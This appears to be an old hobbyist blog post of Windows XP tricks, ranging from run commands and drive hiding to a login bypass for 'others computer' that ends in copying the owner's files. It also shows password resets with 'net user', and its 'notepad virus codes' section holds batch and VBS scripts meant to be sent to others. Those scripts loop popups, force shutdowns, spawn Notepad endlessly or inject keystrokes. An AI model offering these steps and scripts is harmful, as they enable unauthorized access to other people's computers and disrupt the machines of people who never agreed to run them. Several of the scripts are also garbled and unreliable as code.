Pages

Ads 468x60px

Featured Posts

Wednesday, June 20, 2012

LOGN IN XP WITHOUT PASSWORD

Many of u know this but still 4 those who are not aware of this trick...

If u forgot password or want to log on in others computer just follow this trick....

Works 100% on XP ...don't know abt. other O.S.

the trick follows---

1) start computer
2) when it asks for password press ctrl+alt+delete keys twice
3) now another window opens asking for password.
4) in this at the place of user name just type administrator....leave the password feild blank and hit enter
5)wow u have logged in as a normal user
6) now u hav full authority only problem is that u can't open my document of the original account.
6) don't worry abt. this just use any file recovery softwere and move the files from acess denied my document to any other folder(in other drive)

S0ME USEFUL RUN COMMANDS

Just go start,then click on Run then type any comand below

0) cmd - comand prompt
1) compmgmt.msc - for computer managent
2) devmgmt.msc - device manager
3) regedit - registry editor
4) msconfig - system configuratn utility . . .
5) compmgmt.msc - Computer management
6) devmgmt.msc - Device manager
7) diskmgmt.msc - Disk management
8) dfrg.msc - Disk defrag
9) eventvwr.msc - Event viewer
10) fsmgmt.msc - Shared folders
11) gpedit.msc - Group policies
12) lusrmgr.msc - Local users and groups
13) perfmon.msc - Performance monitor
14) rsop.msc - Resultant set of policies
15) secpol.msc - Local security settings
16) services.msc - Various Services
17) msinfo32 - System Information
18) sysedit - System Edit
19) win.ini - windows loading information(also system.ini)
20) winver _ Shows current version of windows
21) calc - calculator

Change any Users Password

This tweak gives a user the opportunity to use it for good or bad. It enables the user to re-password any account without having to know the existing password and also shows you every account that exists on the machine (even the ones that are hidden). This is a good tool to use if you forgot a password to say your administrator account and you needed to be logged into the admin account for any reason.

>>To view all of the user accounts:

1) While logged onto the computer, click on Start>Run>and type in CMD.
2) From the command prompt window, type in cmd net users
This will show you every account that is made onto the computer whether it is hidden or not.


To change an account password:
1) While logged into the computer to an account that has administrative rights, click on Start>Run>and type>>CMD>>

2) Type in net user then the name of the account then * and press enter. heres an example: net user administrator * or net user "TRICKS GOD" * . Put the name in quotes if it contains spaces.

3) From there it should ask for a new password. Type in your new password (type very carefully - the command window won't display what you type) and once more to confirm it. If you get the message that the command succeeded successfully you're all set!!

Hide Your Disk Drive

Here is a simple method to hide ur disk drive >>open control panel
>>go to administrative tools
>>click computer managment
>>now a window will appear
>>click disk managment on the left column now u will see al disk drives
>.suppose u have to hide local disk E
>>right click on local disk E and choose "change drive letter and paths" now a small window will appear showing ur letter"E" click remove and then ok.....

open my computer u will not see local disk E to bring back repeat the abv steps but when u open disk managment the drive that is hidden will b without any letter
>>right click on it and
>>choose "change drive letter and paths"
>>press add and than ok

How To Reinstall Windows Without Losing Anything

You can use this method as often as you like when you need to repair something that had gotten corrupted and you don't want to do a clean install.
This is better than doing a windows repair install from the cd because doing that can cause changes to settings and even make it so you can't get updates anymore from microsoft update site because of the 'silent install' they did a year or so ago (unless you rereg some dll files).
1- Start WindowsXP
2- Go to the location of your source files
3- Run WINNT32 /unattend
For example, D:\I386\winnt32 /unattend ( copy & paste this command into the RUN box, then press ENTER ) Your computer will do the rest.
OR
Start > All Programs > Accessories > Command Prompt. Copy & paste > D:\I386\winnt32 /unattend (notice the space between 32 and / ) Press Enter.
If you have i386 on your drive, you can replace D: ( if D: is your cd drive ) with the location of it. (be sure it's the full i386 though)
D: is the driver letter where your windows XP Cd is if D:\I386\winnt32 /unattend doesn't work then try : d:\winnt32 /unattend.

PUT UR NAME AFTER TIME IN TASKBAR

Trick to Show Your name after time in taskbar... Try this trick to add up ur name in place of AM and PM beside time Its simple Step-1:- Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ... Did It change? If not, follow step-2 below. Step2:- Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK and enjoy

NOTEPAD VIRUS CODES

1. Cycle a message in your friend's computer:
open notepad and Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save it as Anything.BAT and send it to ur frenz or enemy.

2. Convey your friend a lil' message and shut down his / her computer:
Type :

wx@echo off
msg * I don't like you
shutdown -c Error! You are too stupid! -s


Save it as Anything.BAT in All Files and send it.


3.Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32
notepad.exe
GOTO top


Save it as Anything.BAT and send it.
4.Hack your friend's keyboard and make him type You are a fool simultaneously
Type :
Set wshShell = wscript.CreateObject(WScript.Shell)
do
wscript.sleep 100
wshshell.sendkeys You are a fool.
loop

Save it as Anything.VBS and send it.